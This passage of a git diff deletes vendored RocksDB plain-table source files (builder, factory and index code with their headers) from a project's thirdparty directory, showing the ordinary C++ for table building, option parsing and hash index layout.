-  // -- Write property block
-  BlockHandle property_block_handle;
-  auto s = WriteBlock(
-      property_block_builder.Finish(),
-      file_,
-      &offset_,
-      &property_block_handle
-  );
-  if (!s.ok()) {
-    return s;
-  }
-  meta_index_builer.Add(kPropertiesBlock, property_block_handle);
-
-  // -- write metaindex block
-  BlockHandle metaindex_block_handle;
-  s = WriteBlock(
-      meta_index_builer.Finish(),
-      file_,
-      &offset_,
-      &metaindex_block_handle
-  );
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Write Footer
-  // no need to write out new footer if we're using default checksum
-  Footer footer(kLegacyPlainTableMagicNumber, 0);
-  footer.set_metaindex_handle(metaindex_block_handle);
-  footer.set_index_handle(BlockHandle::NullBlockHandle());
-  std::string footer_encoding;
-  footer.EncodeTo(&footer_encoding);
-  s = file_->Append(footer_encoding);
-  if (s.ok()) {
-    offset_ += footer_encoding.size();
-  }
-
-  return s;
-}
-
-void PlainTableBuilder::Abandon() {
-  closed_ = true;
-}
-
-uint64_t PlainTableBuilder::NumEntries() const {
-  return properties_.num_entries;
-}
-
-uint64_t PlainTableBuilder::FileSize() const {
-  return offset_;
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_builder.h b/thirdparty/rocksdb/table/plain_table_builder.h
deleted file mode 100644
index 1d1f6c7..0000000
--- a/thirdparty/rocksdb/table/plain_table_builder.h
+++ /dev/null
@@ -1,137 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <stdint.h>
-#include <string>
-#include <vector>
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/bloom_block.h"
-#include "table/plain_table_index.h"
-#include "table/plain_table_key_coding.h"
-#include "table/table_builder.h"
-
-namespace rocksdb {
-
-class BlockBuilder;
-class BlockHandle;
-class WritableFile;
-class TableBuilder;
-
-class PlainTableBuilder: public TableBuilder {
- public:
-  // Create a builder that will store the contents of the table it is
-  // building in *file.  Does not close the file.  It is up to the
-  // caller to close the file after calling Finish(). The output file
-  // will be part of level specified by 'level'.  A value of -1 means
-  // that the caller does not know which level the output file will reside.
-  PlainTableBuilder(
-      const ImmutableCFOptions& ioptions,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          int_tbl_prop_collector_factories,
-      uint32_t column_family_id, WritableFileWriter* file,
-      uint32_t user_key_size, EncodingType encoding_type,
-      size_t index_sparseness, uint32_t bloom_bits_per_key,
-      const std::string& column_family_name, uint32_t num_probes = 6,
-      size_t huge_page_tlb_size = 0, double hash_table_ratio = 0,
-      bool store_index_in_file = false);
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~PlainTableBuilder();
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override;
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override;
-
-  // Finish building the table.  Stops using the file passed to the
-  // constructor after this function returns.
-  // REQUIRES: Finish(), Abandon() have not been called
-  Status Finish() override;
-
-  // Indicate that the contents of this builder should be abandoned.  Stops
-  // using the file passed to the constructor after this function returns.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Abandon() override;
-
-  // Number of calls to Add() so far.
-  uint64_t NumEntries() const override;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  uint64_t FileSize() const override;
-
-  TableProperties GetTableProperties() const override { return properties_; }
-
-  bool SaveIndexInFile() const { return store_index_in_file_; }
-
- private:
-  Arena arena_;
-  const ImmutableCFOptions& ioptions_;
-  std::vector<std::unique_ptr<IntTblPropCollector>>
-      table_properties_collectors_;
-
-  BloomBlockBuilder bloom_block_;
-  std::unique_ptr<PlainTableIndexBuilder> index_builder_;
-
-  WritableFileWriter* file_;
-  uint64_t offset_ = 0;
-  uint32_t bloom_bits_per_key_;
-  size_t huge_page_tlb_size_;
-  Status status_;
-  TableProperties properties_;
-  PlainTableKeyEncoder encoder_;
-
-  bool store_index_in_file_;
-
-  std::vector<uint32_t> keys_or_prefixes_hashes_;
-  bool closed_ = false;  // Either Finish() or Abandon() has been called.
-
-  const SliceTransform* prefix_extractor_;
-
-  Slice GetPrefix(const Slice& target) const {
-    assert(target.size() >= 8);  // target is internal key
-    return GetPrefixFromUserKey(GetUserKey(target));
-  }
-
-  Slice GetPrefix(const ParsedInternalKey& target) const {
-    return GetPrefixFromUserKey(target.user_key);
-  }
-
-  Slice GetUserKey(const Slice& key) const {
-    return Slice(key.data(), key.size() - 8);
-  }
-
-  Slice GetPrefixFromUserKey(const Slice& user_key) const {
-    if (!IsTotalOrderMode()) {
-      return prefix_extractor_->Transform(user_key);
-    } else {
-      // Use empty slice as prefix if prefix_extractor is not set.
-      // In that case,
-      // it falls back to pure binary search and
-      // total iterator seek is supported.
-      return Slice();
-    }
-  }
-
-  bool IsTotalOrderMode() const { return (prefix_extractor_ == nullptr); }
-
-  // No copying allowed
-  PlainTableBuilder(const PlainTableBuilder&) = delete;
-  void operator=(const PlainTableBuilder&) = delete;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_factory.cc b/thirdparty/rocksdb/table/plain_table_factory.cc
deleted file mode 100644
index 5f7809b..0000000
--- a/thirdparty/rocksdb/table/plain_table_factory.cc
+++ /dev/null
@@ -1,238 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-#include "table/plain_table_factory.h"
-
-#include <stdint.h>
-#include <memory>
-#include "db/dbformat.h"
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "rocksdb/convenience.h"
-#include "table/plain_table_builder.h"
-#include "table/plain_table_reader.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-Status PlainTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table,
-    bool prefetch_index_and_filter_in_cache) const {
-  return PlainTableReader::Open(
-      table_reader_options.ioptions, table_reader_options.env_options,
-      table_reader_options.internal_comparator, std::move(file), file_size,
-      table, table_options_.bloom_bits_per_key, table_options_.hash_table_ratio,
-      table_options_.index_sparseness, table_options_.huge_page_tlb_size,
-      table_options_.full_scan_mode);
-}
-
-TableBuilder* PlainTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  // Ignore the skip_filters flag. PlainTable format is optimized for small
-  // in-memory dbs. The skip_filters optimization is not useful for plain
-  // tables
-  //
-  return new PlainTableBuilder(
-      table_builder_options.ioptions,
-      table_builder_options.int_tbl_prop_collector_factories, column_family_id,
-      file, table_options_.user_key_len, table_options_.encoding_type,
-      table_options_.index_sparseness, table_options_.bloom_bits_per_key,
-      table_builder_options.column_family_name, 6,
-      table_options_.huge_page_tlb_size, table_options_.hash_table_ratio,
-      table_options_.store_index_in_file);
-}
-
-std::string PlainTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "  user_key_len: %u\n",
-           table_options_.user_key_len);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  bloom_bits_per_key: %d\n",
-           table_options_.bloom_bits_per_key);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  hash_table_ratio: %lf\n",
-           table_options_.hash_table_ratio);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  index_sparseness: %" ROCKSDB_PRIszt "\n",
-           table_options_.index_sparseness);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  huge_page_tlb_size: %" ROCKSDB_PRIszt "\n",
-           table_options_.huge_page_tlb_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  encoding_type: %d\n",
-           table_options_.encoding_type);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  full_scan_mode: %d\n",
-           table_options_.full_scan_mode);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  store_index_in_file: %d\n",
-           table_options_.store_index_in_file);
-  ret.append(buffer);
-  return ret;
-}
-
-const PlainTableOptions& PlainTableFactory::table_options() const {
-  return table_options_;
-}
-
-Status GetPlainTableOptionsFromString(const PlainTableOptions& table_options,
-                                      const std::string& opts_str,
-                                      PlainTableOptions* new_table_options) {
-  std::unordered_map<std::string, std::string> opts_map;
-  Status s = StringToMap(opts_str, &opts_map);
-  if (!s.ok()) {
-    return s;
-  }
-  return GetPlainTableOptionsFromMap(table_options, opts_map,
-                                     new_table_options);
-}
-
-Status GetMemTableRepFactoryFromString(
-    const std::string& opts_str,
-    std::unique_ptr<MemTableRepFactory>* new_mem_factory) {
-  std::vector<std::string> opts_list = StringSplit(opts_str, ':');
-  size_t len = opts_list.size();
-
-  if (opts_list.size() <= 0 || opts_list.size() > 2) {
-    return Status::InvalidArgument("Can't parse memtable_factory option ",
-                                   opts_str);
-  }
-
-  MemTableRepFactory* mem_factory = nullptr;
-
-  if (opts_list[0] == "skip_list") {
-    // Expecting format
-    // skip_list:<lookahead>
-    if (2 == len) {
-      size_t lookahead = ParseSizeT(opts_list[1]);
-      mem_factory = new SkipListFactory(lookahead);
-    } else if (1 == len) {
-      mem_factory = new SkipListFactory();
-    }
-  } else if (opts_list[0] == "prefix_hash") {
-    // Expecting format
-    // prfix_hash:<hash_bucket_count>
-    if (2 == len) {
-      size_t hash_bucket_count = ParseSizeT(opts_list[1]);
-      mem_factory = NewHashSkipListRepFactory(hash_bucket_count);
-    } else if (1 == len) {
-      mem_factory = NewHashSkipListRepFactory();
-    }
-  } else if (opts_list[0] == "hash_linkedlist") {
-    // Expecting format
-    // hash_linkedlist:<hash_bucket_count>
-    if (2 == len) {
-      size_t hash_bucket_count = ParseSizeT(opts_list[1]);
-      mem_factory = NewHashLinkListRepFactory(hash_bucket_count);
-    } else if (1 == len) {
-      mem_factory = NewHashLinkListRepFactory();
-    }
-  } else if (opts_list[0] == "vector") {
-    // Expecting format
-    // vector:<count>
-    if (2 == len) {
-      size_t count = ParseSizeT(opts_list[1]);
-      mem_factory = new VectorRepFactory(count);
-    } else if (1 == len) {
-      mem_factory = new VectorRepFactory();
-    }
-  } else if (opts_list[0] == "cuckoo") {
-    // Expecting format
-    // cuckoo:<write_buffer_size>
-    if (2 == len) {
-      size_t write_buffer_size = ParseSizeT(opts_list[1]);
-      mem_factory = NewHashCuckooRepFactory(write_buffer_size);
-    } else if (1 == len) {
-      return Status::InvalidArgument("Can't parse memtable_factory option ",
-                                     opts_str);
-    }
-  } else {
-    return Status::InvalidArgument("Unrecognized memtable_factory option ",
-                                   opts_str);
-  }
-
-  if (mem_factory != nullptr) {
-    new_mem_factory->reset(mem_factory);
-  }
-
-  return Status::OK();
-}
-
-std::string ParsePlainTableOptions(const std::string& name,
-                                   const std::string& org_value,
-                                   PlainTableOptions* new_options,
-                                   bool input_strings_escaped = false,
-                                   bool ignore_unknown_options = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  const auto iter = plain_table_type_info.find(name);
-  if (iter == plain_table_type_info.end()) {
-    if (ignore_unknown_options) {
-      return "";
-    } else {
-      return "Unrecognized option";
-    }
-  }
-  const auto& opt_info = iter->second;
-  if (opt_info.verification != OptionVerificationType::kDeprecated &&
-      !ParseOptionHelper(reinterpret_cast<char*>(new_options) + opt_info.offset,
-                         opt_info.type, value)) {
-    return "Invalid value";
-  }
-  return "";
-}
-
-Status GetPlainTableOptionsFromMap(
-    const PlainTableOptions& table_options,
-    const std::unordered_map<std::string, std::string>& opts_map,
-    PlainTableOptions* new_table_options, bool input_strings_escaped,
-    bool ignore_unknown_options) {
-  assert(new_table_options);
-  *new_table_options = table_options;
-  for (const auto& o : opts_map) {
-    auto error_message = ParsePlainTableOptions(
-        o.first, o.second, new_table_options, input_strings_escaped);
-    if (error_message != "") {
-      const auto iter = plain_table_type_info.find(o.first);
-      if (iter == plain_table_type_info.end() ||
-          !input_strings_escaped ||  // !input_strings_escaped indicates
-                                     // the old API, where everything is
-                                     // parsable.
-          (iter->second.verification != OptionVerificationType::kByName &&
-           iter->second.verification !=
-               OptionVerificationType::kByNameAllowNull &&
-           iter->second.verification != OptionVerificationType::kDeprecated)) {
-        // Restore "new_options" to the default "base_options".
-        *new_table_options = table_options;
-        return Status::InvalidArgument("Can't parse PlainTableOptions:",
-                                       o.first + " " + error_message);
-      }
-    }
-  }
-  return Status::OK();
-}
-
-extern TableFactory* NewPlainTableFactory(const PlainTableOptions& options) {
-  return new PlainTableFactory(options);
-}
-
-const std::string PlainTablePropertyNames::kEncodingType =
-    "rocksdb.plain.table.encoding.type";
-
-const std::string PlainTablePropertyNames::kBloomVersion =
-    "rocksdb.plain.table.bloom.version";
-
-const std::string PlainTablePropertyNames::kNumBloomBlocks =
-    "rocksdb.plain.table.bloom.numblocks";
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_factory.h b/thirdparty/rocksdb/table/plain_table_factory.h
deleted file mode 100644
index 6c9ca44..0000000
--- a/thirdparty/rocksdb/table/plain_table_factory.h
+++ /dev/null
@@ -1,210 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <memory>
-#include <string>
-#include <stdint.h>
-
-#include "options/options_helper.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-struct EnvOptions;
-
-using std::unique_ptr;
-class Status;
-class RandomAccessFile;
-class WritableFile;
-class Table;
-class TableBuilder;
-
-// IndexedTable requires fixed length key, configured as a constructor
-// parameter of the factory class. Output file format:
-// +-------------+-----------------+
-// | version     | user_key_length |
-// +------------++------------+-----------------+  <= key1 offset
-// |  encoded key1            | value_size  |   |
-// +------------+-------------+-------------+   |
-// | value1                                     |
-// |                                            |
-// +--------------------------+-------------+---+  <= key2 offset
-// | encoded key2             | value_size  |   |
-// +------------+-------------+-------------+   |
-// | value2                                     |
-// |                                            |
-// |        ......                              |
-// +-----------------+--------------------------+
-//
-// When the key encoding type is kPlain. Key part is encoded as:
-// +------------+--------------------+
-// | [key_size] |  internal key      |
-// +------------+--------------------+
-// for the case of user_key_len = kPlainTableVariableLength case,
-// and simply:
-// +----------------------+
-// |  internal key        |
-// +----------------------+
-// for user_key_len != kPlainTableVariableLength case.
-//
-// If key encoding type is kPrefix. Keys are encoding in this format.
-// There are three ways to encode a key:
-// (1) Full Key
-// +---------------+---------------+-------------------+
-// | Full Key Flag | Full Key Size | Full Internal Key |
-// +---------------+---------------+-------------------+
-// which simply encodes a full key
-//
-// (2) A key shared the same prefix as the previous key, which is encoded as
-//     format of (1).
-// +-------------+-------------+-------------+-------------+------------+
-// | Prefix Flag | Prefix Size | Suffix Flag | Suffix Size | Key Suffix |
-// +-------------+-------------+-------------+-------------+------------+
-// where key is the suffix part of the key, including the internal bytes.
-// the actual key will be constructed by concatenating prefix part of the
-// previous key, with the suffix part of the key here, with sizes given here.
-//
-// (3) A key shared the same prefix as the previous key, which is encoded as
-//     the format of (2).
-// +-----------------+-----------------+------------------------+
-// | Key Suffix Flag | Key Suffix Size | Suffix of Internal Key |
-// +-----------------+-----------------+------------------------+
-// The key will be constructed by concatenating previous key's prefix (which is
-// also a prefix which the last key encoded in the format of (1)) and the
-// key given here.
-//
-// For example, we for following keys (prefix and suffix are separated by
-// spaces):
-//   0000 0001
-//   0000 00021
-//   0000 0002
-//   00011 00
-//   0002 0001
-// Will be encoded like this:
-//   FK 8 00000001
-//   PF 4 SF 5 00021
-//   SF 4 0002
-//   FK 7 0001100
-//   FK 8 00020001
-// (where FK means full key flag, PF means prefix flag and SF means suffix flag)
-//
-// All those "key flag + key size" shown above are in this format:
-// The 8 bits of the first byte:
-// +----+----+----+----+----+----+----+----+
-// |  Type   |            Size             |
-// +----+----+----+----+----+----+----+----+
-// Type indicates: full key, prefix, or suffix.
-// The last 6 bits are for size. If the size bits are not all 1, it means the
-// size of the key. Otherwise, varint32 is read after this byte. This varint
-// value + 0x3F (the value of all 1) will be the key size.
-//
-// For example, full key with length 16 will be encoded as (binary):
-//     00 010000
-// (00 means full key)
-// and a prefix with 100 bytes will be encoded as:
-//     01 111111    00100101
-//         (63)       (37)
-// (01 means key suffix)
-//
-// All the internal keys above (including kPlain and kPrefix) are encoded in
-// this format:
-// There are two types:
-// (1) normal internal key format
-// +----------- ...... -------------+----+---+---+---+---+---+---+---+
-// |       user key                 |type|      sequence ID          |
-// +----------- ..... --------------+----+---+---+---+---+---+---+---+
-// (2) Special case for keys whose sequence ID is 0 and is value type
-// +----------- ...... -------------+----+
-// |       user key                 |0x80|
-// +----------- ..... --------------+----+
-// To save 7 bytes for the special case where sequence ID = 0.
-//
-//
-class PlainTableFactory : public TableFactory {
- public:
-  ~PlainTableFactory() {}
-  // user_key_len is the length of the user key. If it is set to be
-  // kPlainTableVariableLength, then it means variable length. Otherwise, all
-  // the keys need to have the fix length of this value. bloom_bits_per_key is
-  // number of bits used for bloom filer per key. hash_table_ratio is
-  // the desired utilization of the hash table used for prefix hashing.
-  // hash_table_ratio = number of prefixes / #buckets in the hash table
-  // hash_table_ratio = 0 means skip hash table but only replying on binary
-  // search.
-  // index_sparseness determines index interval for keys
-  // inside the same prefix. It will be the maximum number of linear search
-  // required after hash and binary search.
-  // index_sparseness = 0 means index for every key.
-  // huge_page_tlb_size determines whether to allocate hash indexes from huge
-  // page TLB and the page size if allocating from there. See comments of
-  // Arena::AllocateAligned() for details.
-  explicit PlainTableFactory(
-      const PlainTableOptions& _table_options = PlainTableOptions())
-      : table_options_(_table_options) {}
-
-  const char* Name() const override { return "PlainTable"; }
-  Status NewTableReader(const TableReaderOptions& table_reader_options,
-                        unique_ptr<RandomAccessFileReader>&& file,
-                        uint64_t file_size, unique_ptr<TableReader>* table,
-                        bool prefetch_index_and_filter_in_cache) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  std::string GetPrintableTableOptions() const override;
-
-  const PlainTableOptions& table_options() const;
-
-  static const char kValueTypeSeqId0 = char(0xFF);
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  void* GetOptions() override { return &table_options_; }
-
-  Status GetOptionString(std::string* opt_string,
-                         const std::string& delimiter) const override {
-    return Status::OK();
-  }
-
- private:
-  PlainTableOptions table_options_;
-};
-
-static std::unordered_map<std::string, OptionTypeInfo> plain_table_type_info = {
-    {"user_key_len",
-     {offsetof(struct PlainTableOptions, user_key_len), OptionType::kUInt32T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"bloom_bits_per_key",
-     {offsetof(struct PlainTableOptions, bloom_bits_per_key), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"hash_table_ratio",
-     {offsetof(struct PlainTableOptions, hash_table_ratio), OptionType::kDouble,
-      OptionVerificationType::kNormal, false, 0}},
-    {"index_sparseness",
-     {offsetof(struct PlainTableOptions, index_sparseness), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"huge_page_tlb_size",
-     {offsetof(struct PlainTableOptions, huge_page_tlb_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"encoding_type",
-     {offsetof(struct PlainTableOptions, encoding_type),
-      OptionType::kEncodingType, OptionVerificationType::kByName, false, 0}},
-    {"full_scan_mode",
-     {offsetof(struct PlainTableOptions, full_scan_mode), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"store_index_in_file",
-     {offsetof(struct PlainTableOptions, store_index_in_file),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_index.cc b/thirdparty/rocksdb/table/plain_table_index.cc
deleted file mode 100644
index 39a6b53..0000000
--- a/thirdparty/rocksdb/table/plain_table_index.cc
+++ /dev/null
@@ -1,215 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include "table/plain_table_index.h"
-#include "util/coding.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-namespace {
-inline uint32_t GetBucketIdFromHash(uint32_t hash, uint32_t num_buckets) {
-  assert(num_buckets > 0);
-  return hash % num_buckets;
-}
-}
-
-Status PlainTableIndex::InitFromRawData(Slice data) {
-  if (!GetVarint32(&data, &index_size_)) {
-    return Status::Corruption("Couldn't read the index size!");
-  }
-  assert(index_size_ > 0);
-  if (!GetVarint32(&data, &num_prefixes_)) {
-    return Status::Corruption("Couldn't read the index size!");
-  }
-  sub_index_size_ =
-      static_cast<uint32_t>(data.size()) - index_size_ * kOffsetLen;
-
-  char* index_data_begin = const_cast<char*>(data.data());
-  index_ = reinterpret_cast<uint32_t*>(index_data_begin);
-  sub_index_ = reinterpret_cast<char*>(index_ + index_size_);
-  return Status::OK();
-}
-
-PlainTableIndex::IndexSearchResult PlainTableIndex::GetOffset(
-    uint32_t prefix_hash, uint32_t* bucket_value) const {
-  int bucket = GetBucketIdFromHash(prefix_hash, index_size_);
-  GetUnaligned(index_ + bucket, bucket_value);
-  if ((*bucket_value & kSubIndexMask) == kSubIndexMask) {
-    *bucket_value ^= kSubIndexMask;
-    return kSubindex;
-  }
-  if (*bucket_value >= kMaxFileSize) {
-    return kNoPrefixForBucket;
-  } else {
-    // point directly to the file
-    return kDirectToFile;
-  }
-}
-
-void PlainTableIndexBuilder::IndexRecordList::AddRecord(uint32_t hash,
-                                                        uint32_t offset) {
-  if (num_records_in_current_group_ == kNumRecordsPerGroup) {
-    current_group_ = AllocateNewGroup();
-    num_records_in_current_group_ = 0;
-  }
-  auto& new_record = current_group_[num_records_in_current_group_++];
-  new_record.hash = hash;
-  new_record.offset = offset;
-  new_record.next = nullptr;
-}
-
-void PlainTableIndexBuilder::AddKeyPrefix(Slice key_prefix_slice,
-                                          uint32_t key_offset) {
-  if (is_first_record_ || prev_key_prefix_ != key_prefix_slice.ToString()) {
-    ++num_prefixes_;
-    if (!is_first_record_) {
-      keys_per_prefix_hist_.Add(num_keys_per_prefix_);
-    }
-    num_keys_per_prefix_ = 0;
-    prev_key_prefix_ = key_prefix_slice.ToString();
-    prev_key_prefix_hash_ = GetSliceHash(key_prefix_slice);
-    due_index_ = true;
-  }
-
-  if (due_index_) {
-    // Add an index key for every kIndexIntervalForSamePrefixKeys keys
-    record_list_.AddRecord(prev_key_prefix_hash_, key_offset);
-    due_index_ = false;
-  }
-
-  num_keys_per_prefix_++;
-  if (index_sparseness_ == 0 || num_keys_per_prefix_ % index_sparseness_ == 0) {
-    due_index_ = true;
-  }
-  is_first_record_ = false;
-}
-
-Slice PlainTableIndexBuilder::Finish() {
-  AllocateIndex();
-  std::vector<IndexRecord*> hash_to_offsets(index_size_, nullptr);
-  std::vector<uint32_t> entries_per_bucket(index_size_, 0);
-  BucketizeIndexes(&hash_to_offsets, &entries_per_bucket);
-
-  keys_per_prefix_hist_.Add(num_keys_per_prefix_);
-  ROCKS_LOG_INFO(ioptions_.info_log, "Number of Keys per prefix Histogram: %s",
-                 keys_per_prefix_hist_.ToString().c_str());
-
-  // From the temp data structure, populate indexes.
-  return FillIndexes(hash_to_offsets, entries_per_bucket);
-}
-
-void PlainTableIndexBuilder::AllocateIndex() {
-  if (prefix_extractor_ == nullptr || hash_table_ratio_ <= 0) {
-    // Fall back to pure binary search if the user fails to specify a prefix
-    // extractor.
-    index_size_ = 1;
-  } else {
-    double hash_table_size_multipier = 1.0 / hash_table_ratio_;
-    index_size_ =
-      static_cast<uint32_t>(num_prefixes_ * hash_table_size_multipier) + 1;
-    assert(index_size_ > 0);
-  }
-}
-
-void PlainTableIndexBuilder::BucketizeIndexes(
-    std::vector<IndexRecord*>* hash_to_offsets,
-    std::vector<uint32_t>* entries_per_bucket) {
-  bool first = true;
-  uint32_t prev_hash = 0;
-  size_t num_records = record_list_.GetNumRecords();
-  for (size_t i = 0; i < num_records; i++) {
-    IndexRecord* index_record = record_list_.At(i);
-    uint32_t cur_hash = index_record->hash;
-    if (first || prev_hash != cur_hash) {
-      prev_hash = cur_hash;
-      first = false;
-    }
-    uint32_t bucket = GetBucketIdFromHash(cur_hash, index_size_);
-    IndexRecord* prev_bucket_head = (*hash_to_offsets)[bucket];
-    index_record->next = prev_bucket_head;
-    (*hash_to_offsets)[bucket] = index_record;
-    (*entries_per_bucket)[bucket]++;
-  }
-
-  sub_index_size_ = 0;
-  for (auto entry_count : *entries_per_bucket) {
-    if (entry_count <= 1) {
-      continue;
-    }
-    // Only buckets with more than 1 entry will have subindex.
-    sub_index_size_ += VarintLength(entry_count);
-    // total bytes needed to store these entries' in-file offsets.
-    sub_index_size_ += entry_count * PlainTableIndex::kOffsetLen;
-  }
-}
-
-Slice PlainTableIndexBuilder::FillIndexes(
-    const std::vector<IndexRecord*>& hash_to_offsets,
-    const std::vector<uint32_t>& entries_per_bucket) {
-  ROCKS_LOG_DEBUG(ioptions_.info_log,
-                  "Reserving %" PRIu32 " bytes for plain table's sub_index",
-                  sub_index_size_);
-  auto total_allocate_size = GetTotalSize();
-  char* allocated = arena_->AllocateAligned(
-      total_allocate_size, huge_page_tlb_size_, ioptions_.info_log);
-
-  auto temp_ptr = EncodeVarint32(allocated, index_size_);
-  uint32_t* index =
-      reinterpret_cast<uint32_t*>(EncodeVarint32(temp_ptr, num_prefixes_));
-  char* sub_index = reinterpret_cast<char*>(index + index_size_);
-
-  uint32_t sub_index_offset = 0;
-  for (uint32_t i = 0; i < index_size_; i++) {
-    uint32_t num_keys_for_bucket = entries_per_bucket[i];
-    switch (num_keys_for_bucket) {
-      case 0:
-        // No key for bucket
-        PutUnaligned(index + i, (uint32_t)PlainTableIndex::kMaxFileSize);
-        break;
-      case 1:
-        // point directly to the file offset
-        PutUnaligned(index + i, hash_to_offsets[i]->offset);
-        break;
-      default:
-        // point to second level indexes.
-        PutUnaligned(index + i, sub_index_offset | PlainTableIndex::kSubIndexMask);
-        char* prev_ptr = &sub_index[sub_index_offset];
-        char* cur_ptr = EncodeVarint32(prev_ptr, num_keys_for_bucket);
-        sub_index_offset += static_cast<uint32_t>(cur_ptr - prev_ptr);
-        char* sub_index_pos = &sub_index[sub_index_offset];
-        IndexRecord* record = hash_to_offsets[i];
-        int j;
-        for (j = num_keys_for_bucket - 1; j >= 0 && record;
-             j--, record = record->next) {
-          EncodeFixed32(sub_index_pos + j * sizeof(uint32_t), record->offset);
-        }
-        assert(j == -1 && record == nullptr);
-        sub_index_offset += PlainTableIndex::kOffsetLen * num_keys_for_bucket;
-        assert(sub_index_offset <= sub_index_size_);
-        break;
-    }
-  }
-  assert(sub_index_offset == sub_index_size_);
-
-  ROCKS_LOG_DEBUG(ioptions_.info_log,
-                  "hash table size: %d, suffix_map length %" ROCKSDB_PRIszt,
-                  index_size_, sub_index_size_);
-  return Slice(allocated, GetTotalSize());
-}
-
-const std::string PlainTableIndexBuilder::kPlainTableIndexBlock =
-    "PlainTableIndexBlock";
-};  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_index.h b/thirdparty/rocksdb/table/plain_table_index.h
deleted file mode 100644
index 2916be4..0000000
--- a/thirdparty/rocksdb/table/plain_table_index.h
+++ /dev/null
@@ -1,226 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "monitoring/histogram.h"
-#include "options/cf_options.h"
-#include "rocksdb/options.h"
-#include "util/arena.h"
-#include "util/hash.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-
-// PlainTableIndex contains buckets size of index_size_, each is a
-// 32-bit integer. The lower 31 bits contain an offset value (explained below)
-// and the first bit of the integer indicates type of the offset.
-//
-// +--------------+------------------------------------------------------+
-// | Flag (1 bit) | Offset to binary search buffer or file (31 bits)     +
-// +--------------+------------------------------------------------------+
-//
-// Explanation for the "flag bit":
-//
-// 0 indicates that the bucket contains only one prefix (no conflict when
-//   hashing this prefix), whose first row starts from this offset of the
-// file.
-// 1 indicates that the bucket contains more than one prefixes, or there
-//   are too many rows for one prefix so we need a binary search for it. In
